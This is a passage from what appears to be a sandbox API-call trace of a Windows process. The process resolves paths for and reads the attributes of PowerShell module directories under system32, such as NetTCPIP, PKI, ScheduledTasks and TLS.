lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0159.699] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x3b, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0159.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.699] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c2fdb4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.699] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0159.699] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x3a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0159.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.699] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7d5c2, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.700] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0159.700] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x3a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0159.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.700] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7e767, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.701] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0159.701] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x3f, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0159.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.701] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1d3e2ea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.701] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0159.701] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x41, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0159.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.701] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbbc19, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2081182e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.702] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0159.702] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x3c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0159.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.702] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbc877, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.702] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0159.702] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x4d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0159.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.703] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e300dc, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.703] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0159.703] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x45, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", lpFilePart=0x0) returned 0x44 [0159.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.703] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e30eea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.703] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0159.703] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x37, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", lpFilePart=0x0) returned 0x36 [0159.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.703] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e319e4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.704] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0159.704] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x3d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", lpFilePart=0x0) returned 0x3c [0159.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.704] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e92e4b, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.705] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0159.705] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x43, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", lpFilePart=0x0) returned 0x42 [0159.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.705] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e93bbd, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x208aa1cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.705] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0159.705] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0159.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.705] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e950c4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.706] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0159.706] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0159.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.706] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f64ff6, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.708] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0159.708] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0159.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.708] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f65404, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.708] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0159.708] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", nBufferLength=0x42, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", lpFilePart=0x0) returned 0x41 [0159.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.708] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb8b03, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.709] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0159.709] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x3e, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", lpFilePart=0x0) returned 0x3d [0159.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.709] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb91fe, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.710] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0159.710] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", nBufferLength=0x3b, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0159.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.710] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb9d09, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20968dca, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.710] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0159.710] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", nBufferLength=0x37, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", lpFilePart=0x0) returned 0x36 [0159.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.710] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fba32e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20968dca, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.712] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0159.712] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0159.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.712] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbaba9, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.713] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0159.713] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", nBufferLength=0x49, lpBuffer=0x133ac60, 